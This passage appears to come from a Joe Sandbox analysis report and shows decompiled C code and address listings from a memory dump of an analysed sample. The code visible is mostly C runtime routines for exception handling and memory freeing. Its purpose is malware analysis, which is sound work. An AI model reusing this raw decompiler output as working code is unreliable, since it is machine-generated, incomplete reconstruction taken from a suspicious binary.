                                                										_t236 = _t235 + _v32 * 2;
                                                										goto L46;
                                                									}
                                                									_t164 = GetLastError();
                                                									goto L38;
                                                								} else {
                                                									 *((intOrPtr*)(E00C1DA28(__eflags))) = 0xc;
                                                									 *(E00C1DA15(__eflags)) = 8;
                                                									L39:
                                                									_t236 = _t235 | 0xffffffff;
                                                									__eflags = _t236;
                                                									L40:
                                                									E00C22F9F(_t240);
                                                									return _t236;
                                                								}
                                                							}
                                                						}
                                                						__eflags = _t228 == 1;
                                                						if(_t228 == 1) {
                                                							__eflags =  !_t210 & 0x00000001;
                                                							if(__eflags != 0) {
                                                								_t229 = _a8;
                                                								_v16 = _t210;
                                                								_v24 = _t229;
                                                								_t143 =  *((intOrPtr*)(0xc99448 + _v12 * 4));
                                                								goto L22;
                                                							}
                                                							goto L14;
                                                						} else {
                                                							_t229 = _a8;
                                                							_v16 = _t210;
                                                							_v24 = _t229;
                                                							goto L22;
                                                						}
                                                					}
                                                					L6:
                                                					 *(E00C1DA15(__eflags)) =  *_t145 & 0x00000000;
                                                					 *((intOrPtr*)(E00C1DA28(__eflags))) = 0x16;
                                                					goto L60;
                                                				} else {
                                                					 *(E00C1DA15(_t246)) =  *_t197 & 0x00000000;
                                                					_t139 = E00C1DA28(_t246);
                                                					 *_t139 = 9;
                                                					L61:
                                                					return _t139 | 0xffffffff;
                                                				}
                                                			}





















































                                                0x00c300b6
                                                0x00c300ba
                                                0x00c300bd
                                                0x00c300d7
                                                0x00c300d9
                                                0x00c3043e
                                                0x00c3043e
                                                0x00c30443
                                                0x00c30443
                                                0x00c3044b
                                                0x00c30451
                                                0x00c30451
                                                0x00000000
                                                0x00c30451
                                                0x00c300df
                                                0x00c300e5
                                                0x00000000
                                                0x00000000
                                                0x00c300ef
                                                0x00c300f5
                                                0x00c300f8
                                                0x00c300fb
                                                0x00c30105
                                                0x00c30108
                                                0x00c3010b
                                                0x00c3010f
                                                0x00c30111
                                                0x00000000
                                                0x00000000
                                                0x00c30117
                                                0x00c3011a
                                                0x00c30120
                                                0x00c3013a
                                                0x00c3013c
                                                0x00c3043a
                                                0x00000000
                                                0x00c3043a
                                                0x00c30142
                                                0x00c30145
                                                0x00000000
                                                0x00000000
                                                0x00c3014b
                                                0x00c3014f
                                                0x00000000
                                                0x00000000
                                                0x00c30155
                                                0x00c30158
                                                0x00c3015c
                                                0x00c30163
                                                0x00c30165
                                                0x00c30165
                                                0x00c30168
                                                0x00c301bd
                                                0x00c301bf
                                                0x00c30185
                                                0x00c3018a
                                                0x00c30191
                                                0x00c30197
                                                0x00000000
                                                0x00c301c1
                                                0x00c301c3
                                                0x00c301c4
                                                0x00c301c6
                                                0x00c301c9
                                                0x00c301cb
                                                0x00c301cd
                                                0x00c301cf
                                                0x00c301cf
                                                0x00c301da
                                                0x00c301dc
                                                0x00c301e3
                                                0x00c301e8
                                                0x00c301eb
                                                0x00c301ee
                                                0x00c301f0
                                                0x00c30214
                                                0x00c3021c
                                                0x00c3021f
                                                0x00c30226
                                                0x00c3022d
                                                0x00c30231
                                                0x00c30233
                                                0x00c30236
                                                0x00c3023d
                                                0x00c3023d
                                                0x00c30240
                                                0x00c30242
                                                0x00c30245
                                                0x00c3024a
                                                0x00c3024d
                                                0x00c30256
                                                0x00c3025a
                                                0x00c3025d
                                                0x00c3025f
                                                0x00c30265
                                                0x00c30267
                                                0x00c30270
                                                0x00c30271
                                                0x00c30273
                                                0x00c30277
                                                0x00c30278
                                                0x00c3027c
                                                0x00c3027f
                                                0x00c30289
                                                0x00c3028e
                                                0x00c30291
                                                0x00c302a0
                                                0x00c302a4
                                                0x00c302a7
                                                0x00c302a9
                                                0x00c302ab
                                                0x00c302ad
                                                0x00c302b2
                                                0x00c302b4
                                                0x00c302b8
                                                0x00c302b9
                                                0x00c302bf
                                                0x00c302c9
                                                0x00c302ca
                                                0x00c302cd
                                                0x00c302d2
                                                0x00c302d5
                                                0x00c302e4
                                                0x00c302e8
                                                0x00c302eb
                                                0x00c302ed
                                                0x00c302ef
                                                0x00c302f1
                                                0x00c302f3
                                                0x00c302f9
                                                0x00c302f9
                                                0x00c302fa
                                                0x00c30309
                                                0x00c3030c
                                                0x00c3030d
                                                0x00c3030d
                                                0x00c302f1
                                                0x00c302ed
                                                0x00c302d5
                                                0x00c302ad
                                                0x00c302a9
                                                0x00c30291
                                                0x00c30267
                                                0x00c3025f
                                                0x00c30313
                                                0x00c30319
                                                0x00c3031b
                                                0x00c3038e
                                                0x00c3038e
                                                0x00c30392
                                                0x00c303a2
                                                0x00c303a8
                                                0x00c303aa
                                                0x00c30406
                                                0x00c30406
                                                0x00c3040e
                                                0x00c3040f
                                                0x00c30411
                                                0x00c3042a
                                                0x00c3042d
                                                0x00c3036a
                                                0x00c3036b
                                                0x00000000
                                                0x00c30370
                                                0x00c30433
                                                0x00000000
                                                0x00c30433
                                                0x00c30418
                                                0x00c30423
                                                0x00000000
                                                0x00c30423
                                                0x00c303ac
                                                0x00c303af
                                                0x00c303b2
                                                0x00000000
                                                0x00000000
                                                0x00c303b4
                                                0x00c303b4
                                                0x00c303b7
                                                0x00c303ba
                                                0x00c303bd
                                                0x00c303c4
                                                0x00c303c9
                                                0x00c303cb
                                                0x00c303cf
                                                0x00c303ea
                                                0x00c303ee
                                                0x00c303ef
                                                0x00c303f2
                                                0x00c303f3
                                                0x00c303ff
                                                0x00c303f5
                                                0x00c303f5
                                                0x00c303f5
                                                0x00c303d1
                                                0x00c303d1
                                                0x00c303d1
                                                0x00c303dc
                                                0x00c303e1
                                                0x00c303e4
                                                0x00c303e4
                                                0x00000000
                                                0x00c303c9
                                                0x00c30320
                                                0x00c30323
                                                0x00c3032a
                                                0x00c3032f
                                                0x00000000
                                                0x00000000
                                                0x00c30338
                                                0x00c3033e
                                                0x00c30340
                                                0x00000000
                                                0x00000000
                                                0x00c30342
                                                0x00c30346
                                                0x00000000
                                                0x00000000
                                                0x00c3035a
                                                0x00c30360
                                                0x00c30362
                                                0x00c30386
                                                0x00c30389
                                                0x00000000
                                                0x00c30389
                                                0x00c30364
                                                0x00000000
                                                0x00c301f2
                                                0x00c301f7
                                                0x00c30202
                                                0x00c30371
                                                0x00c30371
                                                0x00c30371
                                                0x00c30374
                                                0x00c30375
                                                0x00000000
                                                0x00c3037d
                                                0x00c301f0
                                                0x00c301bf
                                                0x00c3016a
                                                0x00c3016d
                                                0x00c30181
                                                0x00c30183
                                                0x00c301a4
                                                0x00c301a7
                                                0x00c301aa
                                                0x00c301ad
                                                0x00000000
                                                0x00c301ad
                                                0x00000000
                                                0x00c3016f
                                                0x00c3016f
                                                0x00c30172
                                                0x00c30175
                                                0x00000000
                                                0x00c30175
                                                0x00c3016d
                                                0x00c30122
                                                0x00c30127
                                                0x00c3012f
                                                0x00000000
                                                0x00c300bf
                                                0x00c300c4
                                                0x00c300c7
                                                0x00c300cc
                                                0x00c30456
                                                0x00000000
                                                0x00c30456

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aa630f27347f431269fc41ccd05142bcf6161e46d03530742687b119930b274a
                                                • Instruction ID: 18c751c67dccc130d2f924d012276632495fec85abb359dc9f49620b2006d1f5
                                                • Opcode Fuzzy Hash: aa630f27347f431269fc41ccd05142bcf6161e46d03530742687b119930b274a
                                                • Instruction Fuzzy Hash: E1C12572E142099FDF15DF99D8A0BEDBBB0FF4A300F244159E551AB3A2C7309A42DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E00C2BBAD(void* __edx, char _a4) {
                                                				void* _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				void _t53;
                                                				intOrPtr _t54;
                                                				intOrPtr _t55;
                                                				intOrPtr _t56;
                                                				intOrPtr _t57;
                                                				signed int _t60;
                                                				signed int _t69;
                                                				signed int _t71;
                                                				signed int _t74;
                                                				signed int _t77;
                                                				char _t82;
                                                				void* _t93;
                                                				signed int _t96;
                                                				char _t107;
                                                				char _t108;
                                                				void* _t113;
                                                				char* _t114;
                                                				signed int _t120;
                                                				signed int* _t121;
                                                				char _t123;
                                                				intOrPtr* _t125;
                                                				char* _t130;
                                                
                                                				_t113 = __edx;
                                                				_t123 = _a4;
                                                				_v24 = _t123;
                                                				_v20 = 0;
                                                				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
                                                					_v16 = 1;
                                                					_t93 = E00C22F42(1, 0x50);
                                                					if(_t93 != 0) {
                                                						_t96 = 0x14;
                                                						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
                                                						_t125 = E00C22FD9(4);
                                                						_t120 = 0;
                                                						_v8 = _t125;
                                                						E00C22F9F(0);
                                                						if(_t125 != 0) {
                                                							 *_t125 = 0;
                                                							_t123 = _a4;
                                                							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
                                                								_t53 =  *0xc42060; // 0xc420b4
                                                								 *_t93 = _t53;
                                                								_t54 =  *0xc42064; // 0xc99154
                                                								 *((intOrPtr*)(_t93 + 4)) = _t54;
                                                								_t55 =  *0xc42068; // 0xc99154
                                                								 *((intOrPtr*)(_t93 + 8)) = _t55;
                                                								_t56 =  *0xc42090; // 0xc420b8
                                                								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
                                                								_t57 =  *0xc42094; // 0xc99158
                                                								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
                                                								L19:
                                                								 *_v8 = 1;
                                                								if(_t120 != 0) {
                                                									 *_t120 = 1;
                                                								}
                                                								goto L21;
                                                							}
                                                							_t121 = E00C22FD9(4);
                                                							_v12 = _t121;
                                                							E00C22F9F(0);
                                                							_push(_t93);
                                                							if(_t121 != 0) {
                                                								 *_t121 =  *_t121 & 0x00000000;
                                                								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
                                                								_t69 = E00C27E7B(_t113);
                                                								_t16 = _t93 + 4; // 0x4
                                                								_t71 = E00C27E7B(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
                                                								_t18 = _t93 + 8; // 0x8
                                                								_t74 = E00C27E7B(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18, 1);
                                                								_t77 = E00C27E7B(_t113,  &_v24, 2,  *((intOrPtr*)(_t123 + 0xb0)), 0xe, _t93 + 0x30, _t122);
                                                								_t22 = _t93 + 0x34; // 0x34
                                                								if((E00C27E7B(_t113,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t69 | _t71 | _t74 | _t77) == 0) {
                                                									_t114 =  *((intOrPtr*)(_t93 + 8));
                                                									while(1) {
                                                										_t82 =  *_t114;
                                                										if(_t82 == 0) {
                                                											break;
                                                										}
                                                										_t30 = _t82 - 0x30; // -48
                                                										_t107 = _t30;
                                                										if(_t107 > 9) {
                                                											if(_t82 != 0x3b) {
                                                												L16:
                                                												_t114 = _t114 + 1;
                                                												continue;
                                                											}
                                                											_t130 = _t114;
                                                											do {
                                                												_t108 =  *((intOrPtr*)(_t130 + 1));
                                                												 *_t130 = _t108;
                                                												_t130 = _t130 + 1;
                                                											} while (_t108 != 0);
                                                											continue;
                                                										}
                                                										 *_t114 = _t107;
                                                										goto L16;
                                                									}
                                                									_t120 = _v12;
                                                									_t123 = _a4;
                                                									goto L19;
                                                								}
                                                								E00C2BB44(_t93);
                                                								E00C22F9F(_t93);
                                                								E00C22F9F(_v12);
                                                								_v16 = _v16 | 0xffffffff;
                                                								L12:
                                                								E00C22F9F(_v8);
                                                								return _v16;
                                                							}
                                                							E00C22F9F();
                                                							goto L12;
                                                						}
                                                						E00C22F9F(_t93);
                                                						return 1;
                                                					}
                                                					return 1;
                                                				} else {
                                                					_t120 = 0;
                                                					_v8 = 0;
                                                					_t93 = 0xc42060;
                                                					L21:
                                                					_t60 =  *(_t123 + 0x80);
                                                					if(_t60 != 0) {
                                                						asm("lock dec dword [eax]");
                                                					}
                                                					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
                                                						asm("lock xadd [ecx], eax");
                                                						if((_t60 | 0xffffffff) == 0) {
                                                							E00C22F9F( *((intOrPtr*)(_t123 + 0x7c)));
                                                							E00C22F9F( *(_t123 + 0x88));
                                                						}
                                                					}
                                                					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
                                                					 *(_t123 + 0x80) = _t120;
                                                					 *(_t123 + 0x88) = _t93;
                                                					return 0;
                                                				}
                                                			}






























                                                0x00c2bbad
                                                0x00c2bbb7
                                                0x00c2bbbd
                                                0x00c2bbc0
                                                0x00c2bbc9
                                                0x00c2bbe8
                                                0x00c2bbf0
                                                0x00c2bbf6
                                                0x00c2bc09
                                                0x00c2bc0a
                                                0x00c2bc13
                                                0x00c2bc15
                                                0x00c2bc18
                                                0x00c2bc1b
                                                0x00c2bc24
                                                0x00c2bc35
                                                0x00c2bc37
                                                0x00c2bc40
                                                0x00c2bd8f
                                                0x00c2bd94
                                                0x00c2bd96
                                                0x00c2bd9b
                                                0x00c2bd9e
                                                0x00c2bda3
                                                0x00c2bda6
                                                0x00c2bdab
                                                0x00c2bdae
                                                0x00c2bdb3
                                                0x00c2bd22
                                                0x00c2bd28
                                                0x00c2bd2c
                                                0x00c2bd2e
                                                0x00c2bd2e
                                                0x00000000
                                                0x00c2bd2c
                                                0x00c2bc4d
                                                0x00c2bc51
                                                0x00c2bc54
                                                0x00c2bc5b
                                                0x00c2bc5e
                                                0x00c2bc6b
                                                0x00c2bc71
                                                0x00c2bc7d
                                                0x00c2bc82
                                                0x00c2bc91
                                                0x00c2bc98
                                                0x00c2bca5
                                                0x00c2bcb9
                                                0x00c2bcc3
                                                0x00c2bcda
                                                0x00c2bd06
                                                0x00c2bd16
                                                0x00c2bd16
                                                0x00c2bd1a
                                                0x00000000
                                                0x00000000
                                                0x00c2bd0b
                                                0x00c2bd0b
                                                0x00c2bd11
                                                0x00c2bd7d
                                                0x00c2bd15
                                                0x00c2bd15
                                                0x00000000
                                                0x00c2bd15
                                                0x00c2bd7f
                                                0x00c2bd81
                                                0x00c2bd81
                                                0x00c2bd84
                                                0x00c2bd86
                                                0x00c2bd89
                                                0x00000000
                                                0x00c2bd8d
                                                0x00c2bd13
                                                0x00000000
                                                0x00c2bd13
                                                0x00c2bd1c
                                                0x00c2bd1f
                                                0x00000000
                                                0x00c2bd1f
                                                0x00c2bcdd
                                                0x00c2bce3
                                                0x00c2bceb
                                                0x00c2bcf3
                                                0x00c2bcf7
                                                0x00c2bcfb
                                                0x00000000
                                                0x00c2bd03
                                                0x00c2bc60
                                                0x00000000
                                                0x00c2bc65
                                                0x00c2bc27
                                                0x00000000
                                                0x00c2bc2f
                                                0x00000000
                                                0x00c2bbd3
                                                0x00c2bbd3
                                                0x00c2bbd5
                                                0x00c2bbd8
                                                0x00c2bd30
                                                0x00c2bd30
                                                0x00c2bd38
                                                0x00c2bd3a
                                                0x00c2bd3a
                                                0x00c2bd42
                                                0x00c2bd47
                                                0x00c2bd4b
                                                0x00c2bd50
                                                0x00c2bd5b
                                                0x00c2bd61
                                                0x00c2bd4b
                                                0x00c2bd65
                                                0x00c2bd6a
                                                0x00c2bd70
                                                0x00000000
                                                0x00c2bd70

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 5d7baca24259b064aaf8d7ea091afd3addb4efd3ad57f62f329647e064e85c73
                                                • Instruction ID: a515ea8c7a4ef36a3094417432a9bfc22272aa736cd3f962c6b0396add6a0667
                                                • Opcode Fuzzy Hash: 5d7baca24259b064aaf8d7ea091afd3addb4efd3ad57f62f329647e064e85c73
                                                • Instruction Fuzzy Hash: 5B610371900325AFDB20DF74E881BAAB7F8EF45310F214569F955EB685EB709D00EB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 65%
                                                			E00C1A938(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                                                				signed char* _v0;
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				intOrPtr _v24;
                                                				char _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				signed int _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				void _v64;
                                                				signed int _v68;
                                                				char _v84;
                                                				intOrPtr _v88;
                                                				signed int _v92;
                                                				intOrPtr _v100;
                                                				void _v104;
                                                				intOrPtr* _v112;
                                                				signed char* _v184;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t201;
                                                				signed int _t202;
                                                				char _t203;
                                                				signed int _t205;
                                                				signed int _t207;
                                                				signed char* _t208;
                                                				signed int _t209;
                                                				signed int _t210;
                                                				signed int _t214;
                                                				void* _t217;
                                                				signed char* _t220;
                                                				void* _t222;
                                                				void* _t224;
                                                				signed char _t228;
                                                				signed int _t229;
                                                				void* _t231;
                                                				void* _t234;
                                                				void* _t237;
                                                				signed int _t247;
                                                				void* _t250;
                                                				intOrPtr* _t251;
                                                				signed int _t252;
                                                				intOrPtr _t253;
                                                				signed int _t254;
                                                				void* _t259;
                                                				void* _t264;
                                                				void* _t265;
                                                				signed int _t269;
                                                				signed char* _t270;
                                                				intOrPtr* _t271;
                                                				signed char _t272;
                                                				signed int _t273;
                                                				signed int _t274;
                                                				intOrPtr* _t276;
                                                				signed int _t277;
                                                				signed int _t278;
                                                				signed int _t283;
                                                				signed int _t290;
                                                				signed int _t291;
                                                				signed int _t294;
                                                				signed int _t296;
                                                				signed char* _t297;
                                                				signed int _t298;
                                                				signed char _t299;
                                                				signed int* _t301;
                                                				signed char* _t304;
                                                				signed int _t314;
                                                				signed int _t315;
                                                				signed int _t317;
                                                				signed int _t327;
                                                				void* _t329;
                                                				void* _t331;
                                                				void* _t332;
                                                				void* _t333;
                                                				void* _t334;
                                                
                                                				_t296 = __edx;
                                                				_push(_t315);
                                                				_t301 = _a20;
                                                				_v20 = 0;
                                                				_v28 = 0;
                                                				_t275 = E00C1B8B0(_a8, _a16, _t301);
                                                				_t332 = _t331 + 0xc;
                                                				_v12 = _t275;
                                                				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
                                                					L67:
                                                					_t201 = E00C200C9(_t270, _t275, _t296, _t301, _t315);
                                                					asm("int3");
                                                					_t329 = _t332;
                                                					_t333 = _t332 - 0x38;
                                                					_push(_t270);
                                                					_t271 = _v112;
                                                					__eflags =  *_t271 - 0x80000003;
                                                					if( *_t271 == 0x80000003) {
                                                						return _t201;
                                                					} else {
                                                						_t202 = E00C1A5BC(_t271, _t275, _t296, _t301, _t315, _t301, _t315);
                                                						__eflags =  *(_t202 + 8);
                                                						if( *(_t202 + 8) != 0) {
                                                							__imp__EncodePointer(0);
                                                							_t315 = _t202;
                                                							_t222 = E00C1A5BC(_t271, _t275, _t296, 0, _t315);
                                                							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
                                                							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
                                                								__eflags =  *_t271 - 0xe0434f4d;
                                                								if( *_t271 != 0xe0434f4d) {
                                                									__eflags =  *_t271 - 0xe0434352;
                                                									if( *_t271 != 0xe0434352) {
                                                										_t214 = E00C18169(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
                                                										_t333 = _t333 + 0x1c;
                                                										__eflags = _t214;
                                                										if(_t214 != 0) {
                                                											L84:
                                                											return _t214;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						_t203 = _a16;
                                                						_v28 = _t203;
                                                						_v24 = 0;
                                                						__eflags =  *(_t203 + 0xc);
                                                						if( *(_t203 + 0xc) > 0) {
                                                							_push(_a24);
                                                							E00C1809C(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
                                                							_t298 = _v40;
                                                							_t334 = _t333 + 0x18;
                                                							_t214 = _v44;
                                                							_v20 = _t214;
                                                							_v12 = _t298;
                                                							__eflags = _t298 - _v32;
                                                							if(_t298 >= _v32) {
                                                								goto L84;
                                                							}
                                                							_t277 = _t298 * 0x14;
                                                							__eflags = _t277;
                                                							_v16 = _t277;
                                                							do {
                                                								_t278 = 5;
                                                								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
                                                								_t334 = _t334 + 0xc;
                                                								__eflags = _v64 - _t217;
                                                								if(_v64 > _t217) {
                                                									goto L83;
                                                								}
                                                								__eflags = _t217 - _v60;
                                                								if(_t217 > _v60) {
                                                									goto L83;
                                                								}
                                                								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
                                                								_t283 = _t220[4];
                                                								__eflags = _t283;
                                                								if(_t283 == 0) {
                                                									L81:
                                                									__eflags =  *_t220 & 0x00000040;
                                                									if(( *_t220 & 0x00000040) == 0) {
                                                										_push(0);
                                                										_push(1);
                                                										E00C1A8B8(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
                                                										_t298 = _v12;
                                                										_t334 = _t334 + 0x30;
                                                									}
                                                									goto L83;
                                                								}
                                                								__eflags =  *((char*)(_t283 + 8));
                                                								if( *((char*)(_t283 + 8)) != 0) {
                                                									goto L83;
                                                								}
                                                								goto L81;
                                                								L83:
                                                								_t298 = _t298 + 1;
                                                								_t214 = _v20;
                                                								_t277 = _v16 + 0x14;
                                                								_v12 = _t298;
                                                								_v16 = _t277;
                                                								__eflags = _t298 - _v32;
                                                							} while (_t298 < _v32);
                                                							goto L84;
                                                						}
                                                						E00C200C9(_t271, _t275, _t296, 0, _t315);
                                                						asm("int3");
                                                						_push(_t329);
                                                						_t297 = _v184;
                                                						_push(_t271);
                                                						_push(_t315);
                                                						_push(0);
                                                						_t205 = _t297[4];
                                                						__eflags = _t205;
                                                						if(_t205 == 0) {
                                                							L109:
                                                							_t207 = 1;
                                                							__eflags = 1;
                                                						} else {
                                                							_t276 = _t205 + 8;
                                                							__eflags =  *_t276;
                                                							if( *_t276 == 0) {
                                                								goto L109;
                                                							} else {
                                                								__eflags =  *_t297 & 0x00000080;
                                                								_t304 = _v0;
                                                								if(( *_t297 & 0x00000080) == 0) {
                                                									L91:
                                                									_t272 = _t304[4];
                                                									_t317 = 0;
                                                									__eflags = _t205 - _t272;
                                                									if(_t205 == _t272) {
                                                										L101:
                                                										__eflags =  *_t304 & 0x00000002;
                                                										if(( *_t304 & 0x00000002) == 0) {
                                                											L103:
                                                											_t208 = _a4;
                                                											__eflags =  *_t208 & 0x00000001;
                                                											if(( *_t208 & 0x00000001) == 0) {
                                                												L105:
                                                												__eflags =  *_t208 & 0x00000002;
                                                												if(( *_t208 & 0x00000002) == 0) {
                                                													L107:
                                                													_t317 = 1;
                                                													__eflags = 1;
                                                												} else {
                                                													__eflags =  *_t297 & 0x00000002;
                                                													if(( *_t297 & 0x00000002) != 0) {
                                                														goto L107;
                                                													}
                                                												}
                                                											} else {
                                                												__eflags =  *_t297 & 0x00000001;
                                                												if(( *_t297 & 0x00000001) != 0) {
                                                													goto L105;
                                                												}
                                                											}
                                                										} else {
                                                											__eflags =  *_t297 & 0x00000008;
                                                											if(( *_t297 & 0x00000008) != 0) {
                                                												goto L103;
                                                											}
                                                										}
                                                										_t207 = _t317;
                                                									} else {
                                                										_t184 = _t272 + 8; // 0x6e
                                                										_t209 = _t184;
                                                										while(1) {
                                                											_t273 =  *_t276;
                                                											__eflags = _t273 -  *_t209;
                                                											if(_t273 !=  *_t209) {
                                                												break;
                                                											}
                                                											__eflags = _t273;
                                                											if(_t273 == 0) {
                                                												L97:
                                                												_t210 = _t317;
                                                											} else {
                                                												_t274 =  *((intOrPtr*)(_t276 + 1));
                                                												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
                                                												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
                                                													break;
                                                												} else {
                                                													_t276 = _t276 + 2;
                                                													_t209 = _t209 + 2;
                                                													__eflags = _t274;
                                                													if(_t274 != 0) {
                                                														continue;
                                                													} else {
                                                														goto L97;
                                                													}
                                                												}
                                                											}
                                                											L99:
                                                											__eflags = _t210;
                                                											if(_t210 == 0) {
                                                												goto L101;
                                                											} else {
                                                												_t207 = 0;
                                                											}
                                                											goto L110;
                                                										}
                                                										asm("sbb eax, eax");
                                                										_t210 = _t209 | 0x00000001;
                                                										__eflags = _t210;
                                                										goto L99;
                                                									}
                                                								} else {
                                                									__eflags =  *_t304 & 0x00000010;
                                                									if(( *_t304 & 0x00000010) != 0) {
                                                										goto L109;
                                                									} else {
                                                										goto L91;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						L110:
                                                						return _t207;
                                                					}
                                                				} else {
                                                					_t270 = _a4;
                                                					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                                                						L22:
                                                						_t296 = _a12;
                                                						_v8 = _t296;
                                                						goto L24;
                                                					} else {
                                                						_t315 = 0;
                                                						if(_t270[0x1c] != 0) {
                                                							goto L22;
                                                						} else {
                                                							_t224 = E00C1A5BC(_t270, _t275, _t296, _t301, 0);
                                                							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
                                                								L61:
                                                								return _t224;
                                                							} else {
                                                								_t270 =  *(E00C1A5BC(_t270, _t275, _t296, _t301, 0) + 0x10);
                                                								_t259 = E00C1A5BC(_t270, _t275, _t296, _t301, 0);
                                                								_v28 = 1;
                                                								_v8 =  *((intOrPtr*)(_t259 + 0x14));
                                                								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
                                                									goto L67;
                                                								} else {
                                                									if( *((intOrPtr*)(E00C1A5BC(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
                                                										L23:
                                                										_t296 = _v8;
                                                										_t275 = _v12;
                                                										L24:
                                                										_v52 = _t301;
                                                										_v48 = 0;
                                                										__eflags =  *_t270 - 0xe06d7363;
                                                										if( *_t270 != 0xe06d7363) {
                                                											L57:
                                                											__eflags = _t301[3];
                                                											if(_t301[3] <= 0) {
                                                												goto L60;
                                                											} else {
                                                												__eflags = _a24;
                                                												if(_a24 != 0) {
                                                													goto L67;
                                                												} else {
                                                													_push(_a32);
                                                													_push(_a28);
                                                													_push(_t275);
                                                													_push(_t301);
                                                													_push(_a16);
                                                													_push(_t296);
                                                													_push(_a8);
                                                													_push(_t270);
                                                													L68();
                                                													_t332 = _t332 + 0x20;
                                                													goto L60;
                                                												}
                                                											}
                                                										} else {
                                                											__eflags = _t270[0x10] - 3;
                                                											if(_t270[0x10] != 3) {
                                                												goto L57;
                                                											} else {
                                                												__eflags = _t270[0x14] - 0x19930520;
                                                												if(_t270[0x14] == 0x19930520) {
                                                													L29:
                                                													_t315 = _a32;
                                                													__eflags = _t301[3];
                                                													if(_t301[3] > 0) {
                                                														_push(_a28);
                                                														E00C1809C(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
                                                														_t296 = _v64;
                                                														_t332 = _t332 + 0x18;
                                                														_t247 = _v68;
                                                														_v44 = _t247;
                                                														_v16 = _t296;
                                                														__eflags = _t296 - _v56;
                                                														if(_t296 < _v56) {
                                                															_t290 = _t296 * 0x14;
                                                															__eflags = _t290;
                                                															_v32 = _t290;
                                                															do {
                                                																_t291 = 5;
                                                																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
